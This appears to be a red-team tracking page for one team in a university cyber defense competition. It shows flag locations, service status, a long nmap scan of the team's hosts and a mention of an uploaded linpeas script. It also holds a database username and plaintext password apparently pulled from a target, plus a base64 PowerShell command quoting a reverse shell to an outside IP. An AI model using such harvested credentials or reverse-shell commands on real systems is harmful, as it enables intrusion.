Team 8 Wiki Page

Signup Login
Team Information
Team Celeste logo
Number
Team 8
Name
Celeste
IP Range
104.190.101.0/24
Domain
team8.isucdc.com
Current Place
3rd
Red Teamer(s)
None
Flag Status
Blue Flags
AD C:\Windows\System32\ WWW /etc/ LP C:\Windows\System32\ WMS /etc/ DB /etc/ WWW admin_flag
Red Flags
AD C:\Users\Administrator\ WWW /root/ LP C:\Users\Administrator\ WMS /root/ DB /root/ DB New Table Deface the website
Service Status
AD LDAP
AD RDP
WWW HTTP
WWW SSH
LP RDP
LP SMB
WMS HTTP
WMS SSH
DB SSH
DB SQL
Nmap
Uploaded Files: linpeas(1).sh
spring.datasource.url=jdbc:mysql://10.8.0.40:3306/iseage_db
spring.datasource.username=richard
spring.datasource.password=SpringeEastland99a!-[\=]-!a49SafetiesPassion58a!-[\=]-!a12EvadesLaxative


Starting Nmap 7.93 ( https://nmap.org ) at 2026-04-25 12:59 Central Daylight Time
NSOCK ERROR [0.1900s] ssl_init_helper(): OpenSSL legacy provider failed to load.

Nmap scan report for ad.team8.isucdc.com (104.190.101.10)
Host is up (0.018s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: team8.isucdc.com, Site: Default-First-Site-Name)
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: TEAM8
|   NetBIOS_Domain_Name: TEAM8
|   NetBIOS_Computer_Name: AD
|   DNS_Domain_Name: team8.isucdc.com
|   DNS_Computer_Name: ad.team8.isucdc.com
|   DNS_Tree_Name: team8.isucdc.com
|   Product_Version: 10.0.14393
|_  System_Time: 2026-04-25T18:01:49+00:00
|_ssl-date: 2026-04-25T18:02:29+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=ad.team8.isucdc.com
| Not valid before: 2026-03-31T00:40:41
|_Not valid after:  2026-09-30T00:40:41
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2016 (89%), Microsoft Windows Server 2016 build 10586 - 14393 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: AD; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s

TRACEROUTE (using port 80/tcp)
HOP RTT     ADDRESS
1   0.00 ms 104.190.101.10

Nmap scan report for wms.team8.isucdc.com (104.190.101.30)
Host is up (0.0098s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 9.6p1 Ubuntu 3ubuntu13.15 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 e7495fc92f08b02bfefd8e1e22c53c2a (ECDSA)
|_  256 9e61217add305851d4142b2551ffa628 (ED25519)
8080/tcp open  http-proxy
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.1 404
|     Content-Disposition: inline;filename=f.txt
|     Content-Type: application/json
|     Date: Sat, 25 Apr 2026 17:59:59 GMT
|     Connection: close
|     {"timestamp":"2026-04-25T17:59:59.217Z","status":404,"error":"Not Found","path":"/nice%20ports%2C/Tri%6Eity.txt%2ebak"}
|   GetRequest:
|     HTTP/1.1 404
|     Content-Type: application/json
|     Date: Sat, 25 Apr 2026 17:59:59 GMT
|     Connection: close
|     {"timestamp":"2026-04-25T17:59:59.092Z","status":404,"error":"Not Found","path":"/"}
|   HTTPOptions:
|     HTTP/1.1 404
|     Content-Type: application/json
|     Date: Sat, 25 Apr 2026 17:59:59 GMT
|     Connection: close
|     {"timestamp":"2026-04-25T17:59:59.125Z","status":404,"error":"Not Found","path":"/"}
|   RTSPRequest, Socks5:
|     HTTP/1.1 400
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 435
|     Date: Sat, 25 Apr 2026 17:59:59 GMT
|     Connection: close
|     HTTP Status 400
|     Requestbody {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}

HTTP Status 400

|_    Request
|_http-title: Site doesn't have a title (application/json).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.93%I=7%D=4/25%Time=69ED011F%P=i686-pc-windows-windows%
SF:r(GetRequest,BD,"HTTP/1\.1\x20404\x20\r\nContent-Type:\x20application/j
SF:son\r\nDate:\x20Sat,\x2025\x20Apr\x202026\x2017:59:59\x20GMT\r\nConnect
SF:ion:\x20close\r\n\r\n{\"timestamp\":\"2026-04-25T17:59:59\.092Z\",\"sta
SF:tus\":404,\"error\":\"Not\x20Found\",\"path\":\"/\"}")%r(HTTPOptions,BD
SF:,"HTTP/1\.1\x20404\x20\r\nContent-Type:\x20application/json\r\nDate:\x2
SF:0Sat,\x2025\x20Apr\x202026\x2017:59:59\x20GMT\r\nConnection:\x20close\r
SF:\n\r\n{\"timestamp\":\"2026-04-25T17:59:59\.125Z\",\"status\":404,\"err
SF:or\":\"Not\x20Found\",\"path\":\"/\"}")%r(RTSPRequest,24E,"HTTP/1\.1\x2
SF:0400\x20\r\nContent-Type:\x20text/html;charset=utf-8\r\nContent-Languag
SF:e:\x20en\r\nContent-Length:\x20435\r\nDate:\x20Sat,\x2025\x20Apr\x20202
SF:6\x2017:59:59\x20GMT\r\nConnection:\x20close\r\n\r\n<
SF:html\x20lang=\"en\">HTTP\x20Status\x20400\x20\xe2\x80\x93\
SF:x20Bad\x20Requestbody\x20{font-fami
SF:ly:Tahoma,Arial,sans-serif;}\x20h1,\x20h2,\x20h3,\x20b\x20{color:white;
SF:background-color:#525D76;}\x20h1\x20{font-size:22px;}\x20h2\x20{font-si
SF:ze:16px;}\x20h3\x20{font-size:14px;}\x20p\x20{font-size:12px;}\x20a\x20
SF:{color:black;}\x20\.line\x20{height:1px;background-color:#525D76;border
SF::none;}

HTTP\x20Status\x20400\x20\xe2\x80\x93\x

SF:20Bad\x20Request")%r(FourOhFourRequest,10C,"HTTP/1\.
SF:1\x20404\x20\r\nContent-Disposition:\x20inline;filename=f\.txt\r\nConte
SF:nt-Type:\x20application/json\r\nDate:\x20Sat,\x2025\x20Apr\x202026\x201
SF:7:59:59\x20GMT\r\nConnection:\x20close\r\n\r\n{\"timestamp\":\"2026-04-
SF:25T17:59:59\.217Z\",\"status\":404,\"error\":\"Not\x20Found\",\"path\":
SF:\"/nice%20ports%2C/Tri%6Eity\.txt%2ebak\"}")%r(Socks5,24E,"HTTP/1\.1\x2
SF:0400\x20\r\nContent-Type:\x20text/html;charset=utf-8\r\nContent-Languag
SF:e:\x20en\r\nContent-Length:\x20435\r\nDate:\x20Sat,\x2025\x20Apr\x20202
SF:6\x2017:59:59\x20GMT\r\nConnection:\x20close\r\n\r\n<
SF:html\x20lang=\"en\">HTTP\x20Status\x20400\x20\xe2\x80\x93\
SF:x20Bad\x20Requestbody\x20{font-fami
SF:ly:Tahoma,Arial,sans-serif;}\x20h1,\x20h2,\x20h3,\x20b\x20{color:white;
SF:background-color:#525D76;}\x20h1\x20{font-size:22px;}\x20h2\x20{font-si
SF:ze:16px;}\x20h3\x20{font-size:14px;}\x20p\x20{font-size:12px;}\x20a\x20
SF:{color:black;}\x20\.line\x20{height:1px;background-color:#525D76;border
SF::none;}

HTTP\x20Status\x20400\x20\xe2\x80\x93\x

SF:20Bad\x20Request");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: storage-misc|general purpose
Running (JUST GUESSING): Western Digital embedded (85%), Linux 3.X (85%)
OS CPE: cpe:/o:linux:linux_kernel:3.10
Aggressive OS guesses: Western Digital My Cloud DL4100 NAS (Linux 3.10) (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT     ADDRESS
1   0.00 ms 104.190.101.30

Nmap scan report for lp.team8.isucdc.com (104.190.101.50)
Host is up (0.019s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
445/tcp  open  microsoft-ds  Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: TEAM8
|   NetBIOS_Domain_Name: TEAM8
|   NetBIOS_Computer_Name: LP
|   DNS_Domain_Name: team8.isucdc.com
|   DNS_Computer_Name: LP.team8.isucdc.com
|   DNS_Tree_Name: team8.isucdc.com
|   Product_Version: 10.0.17763
|_  System_Time: 2026-04-25T18:01:48+00:00
| ssl-cert: Subject: commonName=LP.team8.isucdc.com
| Not valid before: 2026-04-01T06:54:54
|_Not valid after:  2026-10-01T06:54:54
|_ssl-date: 2026-04-25T18:02:29+00:00; -1s from scanner time.
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 1 hop
Service Info: OSs: Windows Server 2008 R2 - 2012, Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: -1s, deviation: 0s, median: -1s

TRACEROUTE (using port 80/tcp)
HOP RTT     ADDRESS
1   0.00 ms 104.190.101.50

Nmap scan report for db.team8.isucdc.com (104.190.101.40)
Host is up (0.0097s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10+esm7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 1a4d9b596565722c91182ee851d2a9e7 (RSA)
|   256 41291a4cfcdb14e8edc4c8e1e4a68f0b (ECDSA)
|_  256 d6c245f9ccaf882893a94f2687f6e84c (ED25519)
3306/tcp open  mysql   MySQL (unauthorized)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Linux 3.X|4.X|2.6.X (88%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:2.6
Aggressive OS guesses: Linux 3.12 - 4.10 (88%), Linux 2.6.32 - 3.10 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT     ADDRESS
1   0.00 ms 104.190.101.40

Nmap scan report for www.team8.isucdc.com (104.190.101.20)
Host is up (0.011s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
|   3072 ae4e51c78f4aabd8b946709618e22a1a (RSA)
|   256 483acfc1e17b5841d20e95d38c107ab6 (ECDSA)
|_  256 4d07f5a81d5836abbd954f3f303e9e7b (ED25519)
80/tcp open  http    gunicorn
| fingerprint-strings:
|   GetRequest:
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Sat, 25 Apr 2026 17:59:58 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 5442
|     Vary: Cookie
|     
|     
|     
|     
|     
|     Home
|     
|     rel="stylesheet"
|     integrity="sha384-QWTKZyjpPEjISv5WaRU9OFeRpok6YctnYmDr5pNlyT2bRjXh0JMhjY6hW+ALEwIH"
|     crossorigin="anonymous"
|     
|     rel="stylesheet"
|     href="/static/css/style.css"
|     
|     
|     
|     
|     
|   HTTPOptions:
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Sat, 25 Apr 2026 17:59:58 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Allow: GET, HEAD, OPTIONS
|     Content-Length: 0
|   RTSPRequest:
|     HTTP/1.1 400 Bad Request
|     Connection: close
|     Content-Type: text/html
|     Content-Length: 196
|     
|     
|     Bad Request
|     
|     
|     

Bad Request

|     Invalid HTTP Version 'Invalid HTTP Version: 'RTSP/1.0''
|     
|_   
|_http-title: Home
|_http-server-header: gunicorn
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.93%I=7%D=4/25%Time=69ED011F%P=i686-pc-windows-windows%r(
SF:GetRequest,15EB,"HTTP/1\.0\x20200\x20OK\r\nServer:\x20gunicorn\r\nDate:
SF:\x20Sat,\x2025\x20Apr\x202026\x2017:59:58\x20GMT\r\nConnection:\x20clos
SF:e\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x2
SF:05442\r\nVary:\x20Cookie\r\n\r\n\n
SF:"\x20data-bs-theme=\"dark\">\n\x20\x20\n\x20\x20\x20\x20
SF:charset=\"UTF-8\"\x20/>\n\x20\x20\x20\x20
SF:content=\"width=device-width,\x20initial-scale=1\.0\"\x20/>\n\x20\x20\x
SF:20\x20Home\n\x20\x20\x20\x20
SF:tstrap\.min\.css\"\n\x20\x20\x20\x20\x20\x20rel=\"stylesheet\"\n\x20\x2
SF:0\x20\x20\x20\x20integrity=\"sha384-QWTKZyjpPEjISv5WaRU9OFeRpok6YctnYmD
SF:r5pNlyT2bRjXh0JMhjY6hW\+ALEwIH\"\n\x20\x20\x20\x20\x20\x20crossorigin=\
SF:"anonymous\"\n\x20\x20\x20\x20/>\n\x20\x20\x20\x20
SF:20\x20\x20rel=\"stylesheet\"\n\x20\x20\x20\x20\x20\x20href=\"/static/cs
SF:s/style\.css\"\n\x20\x20\x20\x20/>\n\x20\x20\x20\x20
SF:tcut\x20icon\"\x20href=\"/static/favicon\.ico\">\n\x20\x20\n\x20
SF:\x20\n\x20\x20\x20\x20
SF:ar\x20navbar-expand-lg\x20border-bottom\x20border-secondary-subtle\x20b
SF:g-body\x20sticky-top\x20shadow-sm\">\n\x20\x20\x20\x20\x20\x20
SF:la")%r(HTTPOptions,B3,"HTTP/1\.0\x20200\x20OK\r\nServer:\x20gunicorn\r\
SF:nDate:\x20Sat,\x2025\x20Apr\x202026\x2017:59:58\x20GMT\r\nConnection:\x
SF:20close\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nAllow:\x20GE
SF:T,\x20HEAD,\x20OPTIONS\r\nContent-Length:\x200\r\n\r\n")%r(RTSPRequest,
SF:121,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\nCont
SF:ent-Type:\x20text/html\r\nContent-Length:\x20196\r\n\r\n\n\x20\x2
SF:0\n\x20\x20\x20\x20Bad\x20Request\n\x20\x20
SF:\n\x20\x20\n\x20\x20\x20\x20

Bad\x20Request

\n\x20\
SF:x20\x20\x20Invalid\x20HTTP\x20Version\x20'Invalid\x20HTTP\x20Versi
SF:on:\x20'RTSP/1\.0''\n\x20\x20\n\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Linux 3.X|4.X (88%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
Aggressive OS guesses: Linux 3.12 - 4.10 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

TRACEROUTE (using port 80/tcp)
HOP RTT     ADDRESS
1   0.00 ms 104.190.101.20

Post-scan script results:
| clock-skew:
|   -1s:
|     104.190.101.50 (lp.team8.isucdc.com)
|_    104.190.101.10 (ad.team8.isucdc.com)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 5 IP addresses (5 hosts up) scanned in 173.43 seconds
 powershell -e QQB0ACAAbABpAG4AZQA6ADEAIABjAGgAYQByADoAMQAgACsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBTAG8AYwBrAGUAdABzAC4AVABDAFAAQwBsAGkAZQBuAHQAKAAiADQAOQAuADEAMAAuADIAMQA5AC4AMQA2ADQAIgAsADQANAA0ACAALgAuAC4AIAArACAAfgB+AH4AfgB+AH4AfgB+AH4AfgB+AH4AfgB+AH4AfgB+AH4AfgB+AH4AfgB+AH4AfgB+AH4AfgB+AH4AfgB+AH4AfgB+AH4AfgB+AH4AfgB+AH4AfgB+AH4AfgB+AH4AfgB+AH4AfgAgAH4AfgB+AH4AfgB+AH4AfgB+AH4AfgB+AH4AfgB+AH4AfgAgAFQAaABpAHMAIABzAGMAcgBpAHAAdAAgAGMAbwBuAHQAYQBpAG4AcwAgAG0AYQBsAGkAYwBpAG8AdQBzACAAYwBvAG4AdABlAG4AdAAgAGEAbgBkACAAaABhAHMAIABiAGUAZQBuACAAIABiAGwAbwBjAGsAZQBkACAAYgB5ACAAeQBvAHUAcgAgAGEAbgB0AGkAdgBpAHIAdQBzACAAcwBvAGYAdAB3AGEAcgBlAC4AIAAgACAAIAAgACsAIABDAGEAdABlAGcAbwByAHkASQBuAGYAbwAgACAAIAAgACAAIAAgACAAIAAgADoAIABQAGEAcgBzAGUAcgBFAHIAcgBvAHIAOgAgACgAOgApACAAWwBdACwAIABQAGEAIAAgACAAIAAgAHIAZQBuAHQAQwBvAG4AdABhAGkAbgBzAEUAcgByAG8AcgBSAGUAYwBvAHIAZABFAHgAYwBlAHAAdABpAG8AbgAgACAAIAAgACAAKwAgAEYAdQBsAGwAeQBRAHUAYQBsAGkAZgBpAGUAZABFAHIAcgBvAHIASQBkACAAOgAgAFMAYwByAGkAcAB0AEMAbwBuAHQAYQBpAG4AZQBkAE0AYQBsAGkAYwBpAG8AdQAgACAAIAAgACAAcwBDAG8AbgB0AGUAbgB0ACAAIAA=
Notable Vulnerabilities
Add content here...
Notable Defenses
Add content here...
Team Spirit Issues
Add content here...